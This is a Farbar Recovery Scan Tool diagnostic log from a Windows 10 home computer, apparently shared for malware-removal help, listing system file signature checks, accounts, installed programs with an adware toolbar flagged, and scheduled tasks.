C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-07 13:33

==================== End of FRST.txt ============================


Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by Lexi (2016-03-08 22:57:17)
Running from C:\Users\Lexi\Downloads
Windows 10 Home (X64) (2015-08-28 01:39:17)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2574262253-2623044021-4024016403-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2574262253-2623044021-4024016403-503 - Limited - Disabled)
Guest (S-1-5-21-2574262253-2623044021-4024016403-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2574262253-2623044021-4024016403-1002 - Limited - Enabled)
Lexi (S-1-5-21-2574262253-2623044021-4024016403-1001 - Administrator - Enabled) => C:\Users\Lexi

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader for ScanSnap 4.1 (HKLM-x32\...\{FB400000-0002-0000-0000-074957833700}) (Version: 8.02.380.7259 - ABBYY)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 18.0.0.144 - Adobe Systems Incorporated)
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.14) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.14 - Adobe Systems Incorporated)
Amazon Cloud Drive (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\23ab716f18849b6f) (Version: 2.1.2013.1340 - Amazon)
Amazon Kindle (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Amazon Kindle) (Version:  - Amazon)
Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Amazon Unbox Video (HKLM-x32\...\InstallShield_{54A4839E-87F8-4BD1-9682-A349E9943F0A}) (Version: 2.2.0.153 - Amazon.com)
Amazon Unbox Video (x32 Version: 2.2.0.153 - Amazon.com) Hidden
Apple Application Support (HKLM-x32\...\{B3575D00-27EF-49C2-B9E0-14B3D954E992}) (Version: 1.5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{439760BC-7737-4386-9B1D-A90A3E8A22EA}) (Version: 3.4.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Application X (HKLM-x32\...\Application X1.0) (Version:  - )
Audible Download Manager (HKLM-x32\...\AudibleDownloadManager) (Version: 6.6.0.12 - Audible, Inc.)
AudibleManager (HKLM-x32\...\AudibleManager) (Version: 1637796.2002539448.1402252320.32 - Audible, Inc.)
Avidemux 2.6 - 32 bits (32-bit) (HKLM-x32\...\Avidemux 2.6 - 32 bits) (Version: 2.6.9.00 - )
Bejeweled 2 Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)
BodyMedia SYNC (HKLM-x32\...\InstallShield_{99567851-B7F1-4692-A33A-0732E761220B}) (Version: 2.3.0.98 - BodyMedia, Inc.)
BodyMedia SYNC (x32 Version: 2.3.0.98 - BodyMedia, Inc.) Hidden
Bonjour (HKLM\...\{CA0D2F09-F811-48D4-843E-C87696C6A9D9}) (Version: 3.0.0.2 - Apple Inc.)
Brother MFL-Pro Suite MFC-685CW (HKLM-x32\...\{A3FEC306-FBFF-4B0D-95B9-F9C67C65079E}) (Version: 1.0.2.0 - Brother Industries, Ltd.)
CardMinder (HKLM-x32\...\{D4F2AFD3-0167-4464-B92F-78AB6DA8A0AA}) (Version: V4.1L10 - PFU)
CardMinder V4.1 (x32 Version: 4.1.10.1 - PFU) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Codecs for Windows 7 Pack 4.0.5 (HKLM-x32\...\Codecs for Windows 7 Pack) (Version: 4.0.5 - Codecs for Windows 7 Pack)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.3) (Version: 5.0.0.3 - Coupons.com Incorporated)
Cozi • FlyLady Edition (HKLM-x32\...\{6A40DDB9-D7B7-4C7E-9951-E3E8DE8A6B27}) (Version: 1.0.6029.37342 - Cozi Group, Inc.)
Craft ROBO Controller (HKLM-x32\...\{97D52BC9-D904-413F-A0F7-E3EE4C95B623}) (Version: 5.01 - Graphtec)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DLL Opener (HKLM-x32\...\DLL Opener) (Version: 0.1 - )
Duplicate Cleaner 2.0.6 (HKLM-x32\...\Duplicate Cleaner) (Version: 2.0.6 - DigitalVolcano)
Easy Thumbnails (Remove only) (HKLM-x32\...\Easy Thumbnails_is1) (Version: 3.0 - Fookes Software)
eDoc Organizer (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\fe1b84459eb7239d) (Version: 3.5.2.0 - eDoc LLC)
Escape Rosecliff Island (x32 Version: 2.2.0.82 - WildTangent) Hidden
Evernote v. 5.9.6 (HKLM-x32\...\{A542D366-9877-11E5-B101-005056951CAD}) (Version: 5.9.6.9494 - Evernote Corp.)
Family Tree Maker 2012 (HKLM-x32\...\Family Tree Maker 2012) (Version: 21.0.388 - Ancestry.com, Inc.)
Family Tree Maker 2012 (x32 Version: 21.0.388 - Ancestry.com, Inc.) Hidden
Fast Free Converter (HKLM-x32\...\Fast Free Converter) (Version: 4.1 - Fast Free Converter)
FATE - The Traitor Soul (x32 Version: 2.2.0.82 - WildTangent) Hidden
FileThis Fetch (HKLM-x32\...\{C087314D-EBFD-45B4-8073-A2D6592A4EE2}) (Version: 1.1.22 - FileThis)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 5.4.5.124 - Foxit Corporation)
Free AVI MPEG WMV MP4 FLV Video Joiner 8.7.1 (HKLM-x32\...\Free AVI MPEG WMV MP4 FLV Video Joiner_is1) (Version:  - FreeAudioVideoSoftTech, Inc.)
Garmin POI Loader (HKLM-x32\...\{4AF7F4F9-AEFE-4183-B333-BEDDD193339A}) (Version: 2.7.1 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin WebUpdater (HKLM-x32\...\{00FE2935-FB56-4410-AB5F-D6E70C1771D2}) (Version: 2.5.6 - Garmin Ltd or its subsidiaries)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Gears (HKLM-x32\...\{2FA41EBB-3F5A-35C3-85D6-51EC72A11FBD}) (Version: 0.5.3600 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HandBrake 0.9.8 (HKLM-x32\...\HandBrake) (Version: 0.9.8 - )
Helium (HKLM-x32\...\{9A781940-AC41-4D5E-8E1E-76A04B916FB9}) (Version: 1.0.0 - ClockworkMod)
Intel Driver Update Utility (HKLM-x32\...\{ca4bc3a8-b99c-4416-90d8-351a8ceab458}) (Version: 2.2.0.2 - Intel)
Intel® Driver Update Utility 2.2 (x32 Version: 2.2.0.1 - Intel) Hidden
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.5.7.1002 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{997C9EC4-B53D-479D-81B7-0AEC8D174BA1}) (Version: 10.4.1.10 - Apple Inc.)
Java 7 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417025FF}) (Version: 7.0.250 - Oracle)
Java 6 Update 17 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Jewel Quest 3 (x32 Version: 2.2.0.82 - WildTangent) Hidden
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.44.1 - JMicron Technology Corp.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Keyboarding Without Tears (HKLM-x32\...\Keyboarding-Without-Tears) (Version: 1.0 - UNKNOWN)
Keyboarding Without Tears (x32 Version: 1.0 - UNKNOWN) Hidden
Label@Once 1.0 (HKLM-x32\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
LeapFrog Connect (HKLM-x32\...\UPCShell) (Version: 6.0.19.19317 - LeapFrog)
LeapFrog Connect (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Leapster Explorer Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog My Pals Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog MyOwnStoryTimePad Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Junior Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LG Verizon United Drivers (HKLM-x32\...\{885DBC42-4BCC-4A7E-9F2B-64B25E02E926}) (Version: 2.6.0 - LG Electronics)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Picture It! Photo Premium 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MixiDJ V46 Toolbar (HKLM-x32\...\MixiDJ_V46 Toolbar) (Version: 6.13.3.1 - MixiDJ V46) <==== ATTENTION
MotoHelper MergeModules (x32 Version: 1.0.0 - Motorola) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OverDrive Media Console (HKLM-x32\...\{D07205E7-F6D3-4333-AFCC-782A07685B72}) (Version: 3.2.20 - OverDrive, Inc.)
Penguins! (x32 Version: 2.2.0.82 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Polar Bowler (x32 Version: 2.2.0.82 - WildTangent) Hidden
Quick Web Player (HKLM-x32\...\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1) (Version:  - )
QuickTime (HKLM-x32\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.20.503.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7572 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0013 - REALTEK Semiconductor Corp.)
ROBO Master (HKLM-x32\...\{44E8FA6E-931D-4755-82DA-DB93CE1F238C}) (Version: 5.10.0 - Graphtec)
ScanSnap (x32 Version: 5.1.11.1 - PFU Limited) Hidden
ScanSnap (x32 Version: 5.1.62.2 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V5.1L62 - PFU)
ScanSnap Organizer (HKLM-x32\...\{E58F3B88-3B3E-4F85-9323-04789D979C15}) (Version: V4.1L11 - PFU)
ScanSnap Organizer (x32 Version: 4.1.11.18 - PFU LIMITED) Hidden
Scholastic eReader Support Files (HKLM-x32\...\{0DBAE82C-E2D0-418E-8DA2-4D2F54CC1C58}) (Version: 1.1.4246 - Scholastic)
Screen Recorder Launcher (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\ScreenRecorderLauncher) (Version: 2.0 - )
Secure Online Account Numbers (HKLM-x32\...\{65980EBF-C4B5-4555-823A-94DB7F709E53}) (Version: 2.3.14.0 - Discover)
Secure Online Account Numbers (x32 Version: 2.0.2.0 - Discover) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shop'NCook Menu version 4.0.14 (HKLM-x32\...\{7B2A623E-AF79-4C51-9843-62C0C5D45F74}_is1) (Version: 4.0.14 - Rufenacht Innovative)
Shop'NCook Reader version 4.0.16 (HKLM-x32\...\{4F741F80-FCCF-4D9D-AADF-EF010DBABD49}_is1) (Version: 4.0.16 - Rufenacht Innovative)
SimpleOCR 3.1 (HKLM-x32\...\SimpleOCR 3.1) (Version:  - )
Skitch (HKLM-x32\...\Skitch 2.3.0.10) (Version: 2.3.0.10 - Evernote Corp.)
Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Skype Toolbars (HKLM-x32\...\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}) (Version: 5.0.4137 - Skype Technologies S.A.)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Storia (HKLM-x32\...\{D74EB870-4745-467B-9430-DA53A604A456}) (Version: 1.1.4246 - Scholastic)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.10.0 - Synaptics Incorporated)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.1 - TOSHIBA)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.11 - TOSHIBA CORPORATION)
TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{C14518AF-1A0F-4D39-8011-69BAA01CD380}) (Version: 1.6.07.64 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.2.12-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.2.11.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.3.64 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.6C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.26C - TOSHIBA CORPORATION)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.0.4 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.6 - TOSHIBA Corporation)
Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.3.198 - Symantec Corporation)
TOSHIBA Media Controller (HKLM-x32\...\{983CD6FE-8320-4B80-A8F6-0D0366E0AA22}) (Version: 1.0.80.3.64 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.2.0.38 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.6.0.64 - TOSHIBA Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.3 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 for x64 - TOSHIBA Corporation)
TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{A0E99122-25C1-4CA4-9063-499A2A814EB6}) (Version: 1.6.06.64 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.1.40 - TOSHIBA)
TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.1.1 - TOSHIBA Corporation)
TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.0.9C - TOSHIBA CORPORATION)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.3.4.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
ToshibaRegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.4 - Toshiba)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Leapster Explorer Plugin) (HKLM-x32\...\LeapsterExplorerPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog My Pals Plugin) (HKLM-x32\...\MyPalsPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog MyOwnStoryTimePad Plugin) (HKLM-x32\...\MyOwnStoryTimePadPlugin) (Version: 6.0.19.19317 - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Junior Plugin) (HKLM-x32\...\TagJuniorPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Plugin) (HKLM-x32\...\TagPlugin) (Version: 6.0.19.19317 - LeapFrog)
Utility Common Driver (x32 Version: 1.0.52.1C - TOSHIBA) Hidden
Virtual Families (x32 Version: 2.2.0.82 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.82 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.80 - WildTangent)
WildTangent ORB Game Console (x32 Version:  - WildTangent) Hidden
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - LeapFrog (FlyUsb) USB  (11/05/2008 1.1.1.0) (HKLM\...\781745E87AFF80C0C1388CFF79D19ECAB2E9BB47) (Version: 11/05/2008 1.1.1.0 - LeapFrog)
Windows Driver Package - Leapfrog (Leapfrog-USBLAN) Net  (09/10/2009 02.03.05.012) (HKLM\...\8F14F2ECEDE68D26EA515B48DC25B39103C4FE8D) (Version: 09/10/2009 02.03.05.012 - Leapfrog)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Zuma's Revenge (x32 Version: 2.2.0.82 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Lexi\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => No File
CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Lexi\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0055D0AD-03B3-4D48-AFE3-A38C8C677968} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {019548C8-5866-4E43-947E-549EFB0E5BF0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {0339290B-4D0B-431D-A454-94460BABBE1F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {03ECBFF5-C025-4739-8E50-8F4E8AEA2006} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.3.12\SymErr.exe
Task: {14CBC00D-5A6F-4542-BA8F-F735F987065E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {18F47D62-A171-49D0-9208-AFCD563ACBDE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {20596B4E-B9FC-4C02-B636-29C81118AD7C} - System32\Tasks\{B8C8760C-1B7F-4B92-B355-EB4EBC2220B7} => C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientApp.exe [2011-11-24] (Amazon.com)
Task: {2A1EB5A9-CC18-47FE-8ED5-E8204F70F004} - System32\Tasks\{B28ABF54-12F8-454B-BECD-94AEA917E9D4} => pcalua.exe -a C:\Users\Lexi\Downloads\465-INST-WIN7-A.EXE -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {30B217A2-ECDC-4497-B30E-BE246C50F52C} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3181DE33-4525-4033-8EFC-B3B2A102EEB2} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
